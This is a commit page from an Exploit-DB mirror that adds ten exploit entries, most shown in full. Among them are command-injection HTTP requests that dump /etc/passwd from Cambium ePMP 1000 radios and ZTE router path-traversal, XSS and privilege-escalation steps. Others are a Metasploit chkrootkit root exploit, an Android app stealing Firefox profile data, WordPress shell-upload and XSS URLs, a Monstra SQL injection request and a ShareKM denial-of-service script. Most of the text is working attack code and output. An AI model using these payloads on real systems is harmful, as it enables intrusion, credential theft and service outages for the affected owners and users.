bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-11-21

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2015-11-21 05:01:59 +00:00
parent c9f356cc3c
commit 1871e649f0
12 changed files with 923 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -79,6 +79,7 @@ id,file,description,date,author,platform,type,port
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21
79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0
83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
@ -35035,3 +35036,12 @@ id,file,description,date,author,platform,type,port
38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0
38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,metasploit,hardware,remote,443
38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF Vulnerability",2015-11-19,"High-Tech Bridge SA",php,webapps,80
38766,platforms/multiple/remote/38766.java,"Mozilla Firefox <= 9.0.1 Same Origin Policy Security Bypass Vulnerability",2013-09-17,"Takeshi Terada",multiple,remote,0
38767,platforms/php/webapps/38767.txt,"WordPress RokIntroScroller Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0
38768,platforms/php/webapps/38768.txt,"WordPress RokMicroNews Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0
38769,platforms/php/webapps/38769.txt,"Monstra CMS 'login' Parameter SQL Injection Vulnerability",2013-09-20,linc0ln.dll,php,webapps,0
38770,platforms/php/webapps/38770.txt,"MentalJS Sandbox Security Bypass Vulnerability",2013-09-20,"Rafay Baloch",php,webapps,0
38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0
38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0
38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0

Can't render this file because it is too large.

390
platforms/cgi/webapps/38776.txt Executable file
View file

@ -0,0 +1,390 @@
*July 14, 2015: *First contacted Cambium
*July 14, 2015: *Initial vendor response
*July 16, 2015: *Vuln Details reported to Cambium
*July 31, 2015:* Followup on advisory and fix timelines
*August 03, 2015: *Vendor gives mid-Aug as fix (v2.5) release
timeline. Ceases communication.
*Nov 19, 2015: *Releasing vulnerability details & poc
*Versions affected*: < v2.5
.....
*CVE-IDs* - To be assigned.
.....
*Background *
http://www.cambiumnetworks.com/products/access/epmp-1000/
ePMP™ 1000
Wireless service providers and enterprises need reliable, high-quality
broadband connectivity that can be rapidly deployed and expanded. The
ePMP platform provides stable coverage across large service areas and
enhances your existing infrastructure.
*Deployed by:*
ION Telecom
Kayse Wireless
Vanilla Telecom
Traeger Park
EszakNet
Edera
Videon
COMeSER
Seattle, WA
Budapest Video Surveillance
Desktop
Silo Wireless
Rocket Broadband
Snavely Forest Products
KRK Sistemi
KAJA Komputer
Root Media
*Vulnerability Details*
*From Cambium Networks ePMP 1000 user / configuration guide:
*
ePMP 1000 has four (4) users -
- ADMINISTRATOR, who has full read and write permissions.
- INSTALLER, who has permissions to read and write parameters
applicable to unit installation and monitoring.
- HOME, who has permissions only to access pertinent information for
support purposes
- READONLY, who only has permissions to view the Monitor page.
.....
1. *OS Command Injection *
'admin' and 'installer' users have access to perform Ping and
Traceroute functions via GUI. No other user has this access.
Ping function accepts destination IP address value via 'ping_ip
parameter and uses three (3) other parameters - packets_num, buf_size
and ttl, to perform Ping.
Traceroute function accepts destination IP address via 'traceroute_ip'
parameter.
The application does not perform strict input validation for all these
parameters - ping_ip', packets_num, buf_size and ttl for Ping
function; and traceroute_ip for Traceroute function.
This allows an authenticated user - 'admin' or non-admin,
low-privileged 'installer' & home users - to be able to inject
arbitrary system commands that gets executed by the host.
.....
*PING PoC *
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0
[
*or*
ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0
*or*
ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0
*or*
ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0
]
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
.....
*traceroute - PoC
*
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 16:09:26 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
.....
2. *Weak Authorization Controls + privilege escalation*
'home' and 'readonly' users do not have access to Ping and Traceroute
functions via management portal. However, the application lacks strict
authorization controls, and we can still perform both these functions
by sending corresponding HTTP(S) requests directly, when logged in as
low-privileged, 'home' user.
When we combine this flaw with above described OS Command Injection
affecting ping and traceroute, it is possible for non-admin,
low-privileged, home user to execute system level commands via
'ping' and 'traceroute' functions and dump password hashes easily and
/ or perform any system level functions.
*Note*: readonly user cannot perform this. Only home user can
exploit these.
.....
*Steps to attack -
*
a login as home user
b craft & send HTTP request for ping and traceroute functions
.....
Login - HTTP Request
..
POST /cgi-bin/luci HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=home&password=<password>
.....
Login - HTTP Response
..
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Set-Cookie: sysauth=<home-sysauth_value>;
path=/cgi-bin/luci/;stok=<home-stok-value>
Content-Type: application/json
Expires: 0
Date: Sun, 18 Jan 1970 16:40:50 GMT
Server: Cambium HTTP Server
{ "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/",
"status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status }
..
*Sending HTTP request for Ping function
*
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<home-sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Home User; usernameType=home; stok=<home-stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
..
Similarly, Traceroute function can be exploited.
......................................................................................................................................................
3. *Weak Authorization Controls + Information Disclosure*
In addition to 'admin', only 'installer' user has the option to access
device configuration. home user does not have GUI option and should
not be able to access / download device configuration. However, the
application lacks strict authorization measures and the low-privileged
'home' user can gain unauthorized access to the device configuration
simply by requesting it.
*Configuration backup export* can be performed by directly accessing
the following url:
*http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json
*
Upon a successful config export, full device configuration with
clear-text passwords, usernames, keys, IP addresses, statistics, logs
etc is downloaded.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=<filename>.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server
{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",
<output - snipped>
}
.....
Best Regards,
Karn Ganeshen
--
Best Regards,
Karn Ganeshen

86
platforms/hardware/webapps/38772.txt Executable file
View file

@ -0,0 +1,86 @@
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259
*Note*: Large deployment size, primarily in Peru, used by TdP.
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter ­ username ­ change from 'support' to
'admin'
e. Enter the new password ­> old password is not requested ­> Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear­-text.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: <­­­ admin/XXX1
$sh
ADSL#login show <--­­­ shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <­--­­ admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
--
Best Regards,
Karn Ganeshen

178
platforms/hardware/webapps/38773.txt Executable file
View file

@ -0,0 +1,178 @@
# Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple
vulnerabilities]
# Discovered by: Karn Ganeshen
# CERT VU# 391604
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported
# ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A
# ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE
Overview
ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10
W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.
*CVE-ID*:
CVE-2015-7248
CVE-2015-7249
CVE-2015-7250
CVE-2015-7251
CVE-2015-7252
*Note*: Large deployment size, primarily in Peru, used by TdP.
Description
*CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information
Exposure* - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain
credentials and other sensitive details about the ZXHN H108N R1A.
A. User names and password hashes can be viewed in the page source of
http://<IP>/cgi-bin/webproc
PoC:
Login Page source contents:
...snip....
//get user info
var G_UserInfo = new Array();
var m = 0;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "admin"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here
G_UserInfo[m][2] = "1"; //Level
G_UserInfo[m][3] = "1"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "user"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "2"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "support"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "3"; //Index
m++;
...snip...
B. The configuration file of the device contains usernames, passwords,
keys, and other values in plain text, which can be used by a user with
lower privileges to gain admin account access. This issue also affects ZTE
ZXV10 W300 models, version W300V1.0.0f_ER1_PE.
*CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper
Authorization* - CVE-2015-7249
By default, only admin may authenticate directly with the web
administration pages in the ZXHN H108N R1A. By manipulating parameters in
client-side requests, an attacker may authenticate as another existing
account, such as user or support, and may be able to perform actions
otherwise not allowed.
PoC 1:
1. Login page user drop-down option shows only admin only.
2. Use an intercepting proxy / Tamper Data - and intercept the Login submit
request.
3. Change the username admin to user / support and continue Login.
4. Application permits other users to log in to mgmt portal.
PoC 2:
After logging in as support, some functional options are visibly
restricted. Certain actions can still be performed by calling the url
directly. Application does not perform proper AuthZ checks.
Following poc is a change password link. It is accessible directly, though
it (correctly) is restricted to changing normal user (non-admin) password
only.
http://
<IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd
Other functions / pages may also be accessible to non-privileged users.
*CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper
Limitation of a Pathname to a Restricted Directory ('Path Traversal') *-
CVE-2015-7250
The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter
which takes an unrestricted file path as input, allowing an attacker to
read arbitrary files on the system.
Arbitrary files can be read off of the device. No authentication is
required to exploit this vulnerability.
PoC
HTTP POST request
POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177
getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj­
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
HTTP Response
HTTP/1.0 200 OK
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=7ce7bd4a; expires=Fri, 31­Dec­9999 23:59:59
GMT;path=/
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
*CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of
Hard-coded Credentials* - CVE-2015-7251
In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible
using the hard-coded credentials 'root' for both the username and password.
*CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper
Neutralization of Input During Web Page Generation ('Cross-site
Scripting') *- CVE-2015-7252
In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is
vulnerable to reflected cross-site scripting [pre-authentication].
PoC
POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177
getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj­
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
+++++
--
Best Regards,
Karn Ganeshen

75
platforms/linux/local/38775.rb Executable file
View file

@ -0,0 +1,75 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
# This could also be Excellent, but since it requires
# up to one day to pop a shell, let's set it to Manual instead.
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Chkrootkit Local Privilege Escalation',
'Description' => %q{
Chkrootkit before 0.50 will run any executable file named
/tmp/update as root, allowing a trivial privsec.
WfsDelay is set to 24h, since this is how often a chkrootkit
scan is scheduled by default.
},
'Author' => [
'Thomas Stangner', # Original exploit
'Julien "jvoisin" Voisin' # Metasploit module
],
'References' => [
['CVE', '2014-0476'],
['OSVDB', '107710'],
['EDB', '33899'],
['BID', '67813'],
['CWE', '20'],
['URL', 'http://seclists.org/oss-sec/2014/q2/430']
],
'DisclosureDate' => 'Jun 04 2014',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
))
register_options([
OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
])
end
def check
version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
if version =~ /chkrootkit version 0\.[1-4]/
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_warning('Rooting depends on the crontab (this could take a while)')
write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
cmd_exec('chmod +x /tmp/update')
register_file_for_cleanup('/tmp/update')
print_status('Payload written to /tmp/update')
print_status('Waiting for chkrootkit to run via cron...')
end
end

90
platforms/multiple/remote/38766.java Executable file
View file

@ -0,0 +1,90 @@
source: http://www.securityfocus.com/bid/62480/info
Mozilla Firefox is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass the same-origin policy and certain access restrictions to access data, or execute arbitrary script code in the browser of an unsuspecting user in the context of another site. This could be used to steal sensitive information or launch other attacks.
Note: This issue was previously discussed in BID 62447 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2013-76 through -92 Multiple Vulnerabilities), but has been moved to its own record to better document it.
This issue is fixed in Firefox 24.0.
ckage jp.mbsd.terada.attackfirefox1;
import android.net.Uri;
import android.os.Bundle;
import android.app.Activity;
import android.content.Intent;
public class MainActivity extends Activity {
public final static String MY_PKG =
"jp.mbsd.terada.attackfirefox1";
public final static String MY_TMP_DIR =
"/data/data/" + MY_PKG + "/tmp/";
public final static String HTML_PATH =
MY_TMP_DIR + "A" + Math.random() + ".html";
public final static String TARGET_PKG =
"org.mozilla.firefox";
public final static String TARGET_FILE_PATH =
"/data/data/" + TARGET_PKG + "/files/mozilla/profiles.ini";
public final static String HTML =
"<u>Wait a few seconds.</u>" +
"<script>" +
"function doit() {" +
" var xhr = new XMLHttpRequest;" +
" xhr.onload = function() {" +
" alert(xhr.responseText);" +
" };" +
" xhr.open('GET', document.URL);" +
" xhr.send(null);" +
"}" +
"setTimeout(doit, 8000);" +
"</script>";
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
doit();
}
public void doit() {
try {
// create a malicious HTML
cmdexec("mkdir " + MY_TMP_DIR);
cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
cmdexec("chmod -R 777 " + MY_TMP_DIR);
Thread.sleep(1000);
// force Firefox to load the malicious HTML
invokeFirefox("file://" + HTML_PATH);
Thread.sleep(4000);
// replace the HTML with a symbolic link to profiles.ini
cmdexec("rm " + HTML_PATH);
cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH);
}
catch (Exception e) {}
}
public void invokeFirefox(String url) {
Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url));
intent.setClassName(TARGET_PKG, TARGET_PKG + ".App");
startActivity(intent);
}
public void cmdexec(String cmd) {
try {
String[] tmp = new String[] {"/system/bin/sh", "-c", cmd};
Runtime.getRuntime().exec(tmp);
}
catch (Exception e) {}
}
}

22
platforms/php/webapps/38767.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/62493/info
The RokIntroScroller plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An arbitrary file-upload vulnerability
2. A cross-site scripting vulnerability
3. An information-disclosure vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
RokIntroScroller 1.8 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/page.png&h=1&w=1111111
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/shell.php
http://www.example.com/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php

18
platforms/php/webapps/38768.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/62513/info
The RokMicroNews plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An information-disclosure vulnerability
2. A cross-site scripting vulnerability
3. An arbitrary file-upload vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example1.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example2.com/shell.php

19
platforms/php/webapps/38769.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/62572/info
Monstra CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Monstra 1.2.0 is vulnerable; other versions may also be affected.
POST /admin/ HTTP/1.1
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=f6bd4782f77e4027d3975d32c414a36d
Host: XXX
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
login=-1' or 85 = '83&login_submit=Enter&password=lincoln.dll

7
platforms/php/webapps/38770.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/62581/info
MentalJS is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks.
http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E

20
platforms/windows/dos/38771.py Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/62586/info
ShareKM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the server to crash or disconnect, denying service to legitimate users.
ShareKM 1.0.19 is vulnerable; prior versions may also be affected.
#!/usr/bin/python
import socket
TCP_IP = '192.168.1.100'
TCP_PORT = 55554
BUFFER_SIZE = 1024
MESSAGE = "\x41" * 50000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
s.close()

17
platforms/windows/remote/80.c
View file

@ -1,9 +1,9 @@
/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003) */
